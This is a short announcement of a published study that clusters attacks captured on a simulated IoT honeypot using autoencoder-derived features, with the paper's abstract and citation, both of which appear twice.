Junaid Haseeb, Masood Mansoori, Harith Al-Sahaf, and Ian Welch (Owhiti - Cybersecurity Research Group) collaborated with Dr Yuichi Hirose from the School of Mathematics and Statistics to propose a solution for IoT attacks clustering using Autoencoders.
This work captured attacks on simulated Internet of Things (IoT) devices using a medium-interaction server honeypot. Attackers execute commands to instruct devices during exploitation. To understand the behavioral patterns of captured attacks, we investigated the changes introduced in commands executed by attackers in the attack process and how these attacks are linked in terms of similarities and differences in commands. For this purpose, we proposed an approach comprised of feature extraction, feature construction, Autoencoder (AE)-based feature construction and clustering.
The usage of AE in the proposed system allowed us to generate an efficient representation of input features by learning about data characteristics used for clustering tasks. In this way, the subjective bias of manually correlating commands was removed. Evaluation results show that clustering performed on AE features group attacks with more common features and provide meaningful clustering interpretations to understand behavioral patterns of attacks.
This work has been published in: Junaid Haseeb, Masood Mansoori, Yuichi Hirose, Harith Al-Sahaf, and Ian Welch. "Autoencoder-based feature construction for IoT attacks clustering." Future Generation Computer Systems 127 (2022): 487-502. https://doi.org/10.1016/j.future.2021.09.025
This work captured attacks on simulated Internet of Things (IoT) devices using a medium-interaction server honeypot. Attackers execute commands to instruct devices during exploitation. To understand the behavioral patterns of captured attacks, we investigated the changes introduced in commands executed by attackers in the attack process and how these attacks are linked in terms of similarities and differences in commands. For this purpose, we proposed an approach comprised of feature extraction, feature construction, Autoencoder (AE)-based feature construction and clustering.
The usage of AE in the proposed system allowed us to generate an efficient representation of input features by learning about data characteristics used for clustering tasks. In this way, the subjective bias of manually correlating commands was removed. Evaluation results show that clustering performed on AE features group attacks with more common features and provide meaningful clustering interpretations to understand behavioral patterns of attacks.
This work has been published in: Junaid Haseeb, Masood Mansoori, Yuichi Hirose, Harith Al-Sahaf, and Ian Welch. "Autoencoder-based feature construction for IoT attacks clustering." Future Generation Computer Systems 127 (2022): 487-502. https://doi.org/10.1016/j.future.2021.09.025